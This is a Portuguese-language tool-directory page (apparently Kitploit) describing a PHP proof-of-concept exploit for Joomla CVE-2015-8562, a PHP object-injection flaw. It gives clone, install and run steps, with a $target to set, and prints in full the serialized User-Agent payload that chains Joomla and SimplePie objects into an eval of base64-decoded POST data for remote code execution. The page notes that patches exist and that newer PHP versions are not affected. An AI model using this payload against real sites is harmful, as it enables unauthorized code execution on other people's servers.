Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Joomla-CVE-2015-8562-PHP-POC — Uma prova de conceito para a vulnerabilidade CVE-2015-8562 do Joomla. | Kitploit
Ferramentas/GitHubGitHub/robinhoutevelts/joomla-cve-2015-8562-php-poc
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubrobinhoutevelts/joomla-cve-2015-8562-php-poc

Joomla-CVE-2015-8562-PHP-POC

Uma prova de conceito para a vulnerabilidade CVE-2015-8562 do Joomla.

Ver Repositório
23há 10 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Joomla-CVE-2015-8562-PHP-POC

Um proof of concept para a vulnerabilidade CVE-2015-8562 do Joomla

Pré-visualização

Introdução

Este PoC é uma cópia quase 1:1 da implementação em Python de Gary hospedada no exploit-db.

Usar

É muito fácil de instalar:

root@kitploit:~
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install

Depois que o composer tiver tudo instalado, você precisará alterar $target em exploit.php.

Depois disso, você está pronto para executar:

root@kitploit:~
php exploit.php

CVE-2015-8562

Em dezembro de 2015, uma vulnerabilidade foi encontrada no Joomla. Ela permite que atacantes remotos realizem ataques de injeção de objetos PHP e executem código PHP arbitrário através do cabeçalho HTTP User-Agent.

Essa vulnerabilidade afetou todas as versões do Joomla. Um patch para v1.5.x, v2.5x e v3.x já foi lançado.

Se você estiver executando PHP >= 5.4.45, >= 5.5.29 ou >= 5.6.13, você está seguro, pois este exploit também utiliza CVE-2015-6835.

Nikos Verschore, da PatrolServer, fez um post no blog muito detalhado e foi de grande ajuda para entender essa vulnerabilidade. Você pode usar o mini-scanner gratuitamente para verificar se o seu site está em risco.

O exploit real

É assim que o cabeçalho User-Agent enviado se parece:

root@kitploit:~
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
  s:4:"\0\0\0a";
  O:17:"JSimplepieFactory":0:{}
  s:21:"\0\0\0disconnectHandlers";
  a:1:{
    i:0;
    a:2:{
      i:0;
      O:9:"SimplePie":5:{
        s:8:"sanitize";
        O:20:"JDatabaseDriverMysql":0:{}
        s:5:"cache";
        b:1;
        s:19:"cache_name_function";
        s:6:"assert";
        s:10:"javascript";
        i:9999;
        s:8:"feed_url";
        s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
      }
      i:1;
      s:4:"init";
    }
  }
  s:13:"\0\0\0connection";
  i:1;
}
Baixar ferramenta